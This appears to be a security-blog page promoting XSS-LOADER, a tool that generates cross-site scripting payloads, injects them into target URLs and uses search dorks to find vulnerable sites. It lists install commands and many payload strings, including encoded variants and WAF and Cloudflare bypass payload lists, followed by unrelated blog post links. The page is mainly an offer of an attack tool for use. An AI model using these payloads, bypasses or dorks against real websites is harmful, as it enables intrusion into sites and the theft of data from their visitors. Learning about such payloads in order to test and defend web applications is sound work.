XSS-LOADER : Xss Payload Generator, Scanner & Dork Finder

XSS-LOADER is a all in one tools for XSS PAYLOAD GENERATOR -XSS SCANNER-XSS DORK FINDER and this is written by Hulya Karabag.

  • This tool creates payload for use in xss injection
  • Select default payload tags from parameter or write your payload
  • It makes xss inj. with Xss Scanner parameter
  • It finds vulnerable sites url with Xss Dork Finder parameter

How to use?

Installation

git clone https://github.com/capture0x/XSS-LOADER/
cd XSS-LOADER
pip3 install -r requirements.txt

Usage

python3 payloader.py

Features

  • Basic Payload
    • Sets default parameter to : <script>alert(1)</script>
  • Div Payload
    • Sets default parameter to : <div onpointerover='alert(1)'>MOVE HERE</div
  • Img Payload
    • Sets default parameter to :<img src=x onerror=alert('1');>
  • Body Payload
    • Sets default parameter to : <body ontouchstart=alert(1)>
  • Svg Payload
    • Sets default parameter to : <svg onload=alert('1')>
  • Enter Your Payload
    • Encodes payload writed by user
  • Payload Generator Parameter
    • Encodes payload on selected tag

Also Read – XSHOCK : Tool To Exploits ShellShock

  • UPPER CASE—->
  • UPPER AND LOWER CASE—->
  • URL ENCODE —–> %3Cscript%3Ealert%281%29%3C%2Fscript%3E
  • HTML ENTITY ENCODE—–> <script>alert(1)</script>
  • SPLIT PAYLOAD —–> pt>>alert(1)pt>>
  • HEX ENCODE —–> 3c7363726970743e616c6572742831293c2f7363726970743e
  • UTF-16 ENCODE —–> Encode payload to utf-16 format.
  • UTF-32 ENCODE—–> Encode payload to utf-32 format.
  • DELETE TAG —–> “;alert(‘XSS’);//
  • UNICODE ENCODE—–> %uff1cscript%uff1ealert(1)%uff1c/script%uff1e
  • US-ASCII ENCODE —–> ¼script¾alert(1)¼/script¾
  • BASE64 ENCODE —–> PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
  • UTF-7 ENCODE —–> +ADw-script+AD4-alert(1)+ADw-/script+AD4-
  • PARENTHESIS BYPASS —–>
  • UTF-8 ENCODE —–> %C0%BCscript%C0%BEalert%CA%B91)%C0%BC/script%C0%BE
  • TAG BLOCK BREAKOUT—–> “>
  • SCRIPT BREAKOUT—–>
  • FILE UPLOAD PAYLOAD—–> “>.gif
  • INSIDE COMMENTS BYPASS—–> –>
  • MUTATION PAYLOAD—–> “>
  • MALFORMED IMG—–> “>
  • SPACE BYPASS—–>
  • DOWNLEVEL-HIDDEN BLOCK—–>
  • WAF BYPASS PAYLOADS—–> Show Waf Bypass Payload List
  • CLOUDFLARE BYPASS PAYLOADS—–> Show Cloudflare Bypass Payload List
  • POLYGLOT PAYLOADS—–> Show Polyglot Bypass Payload List
  • ALERT PAYLOADS—–> Show Alert Payload List
  • ALL CREATE PAYLOAD—–> Show Create All Payloads
  • GO BACK MAIN MENU
  • EXIT

Xss Scanner

Initially you’ll need to enter url of target Please enter the url like this example==>e.g target —–> http://target.com/index.php?name= Selected for scanning payload list

BASIC PAYLOAD LIST ==> Payload list consisting of script tag
DIV PAYLOAD LIST ==> Payload list consisting of div tag
IMG PAYLOAD LIST ==> Payload list consisting of img tag
BODY PAYLOAD LIST ==> Payload list consisting of body tag
SVG PAYLOAD LIST ==> Payload list consisting of svg tag
MIXED PAYLOAD LIST ==> Payload list consisting of all tag
ENTER FILE PATH ==> Payload list determined by the user ,Please enter the url like this example..! (e.g. path —–> /usr/share/wordlists/wfuzz/Injections/XSS.txt)

Results will be added in “vulnpayload.txt” after scanning.

Xss Dork Finder

First enter the dork for searching: e.g—->inurl:”search.php?q=” Results will be saved in “dork.txt” after scanning.

Screenshot

R K

Recent Posts

Nmap cheat sheet for beginners

Nmap (Network Mapper) is a free tool that helps you find devices on a network,…

6 hours ago

Understanding the Model Context Protocol (MCP) and How It Works

Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…

1 week ago

The file Command – Quickly Identify File Contents in Linux

While file extensions in Linux are optional and often misleading, the file command helps decode what a…

1 week ago

How to Use the touch Command in Linux

The touch command is one of the quickest ways to create new empty files or update timestamps…

1 week ago

How to Search Files and Folders in Linux Using the find Command

Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…

1 week ago

How to Move and Rename Files in Linux with the mv Command

Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…

1 week ago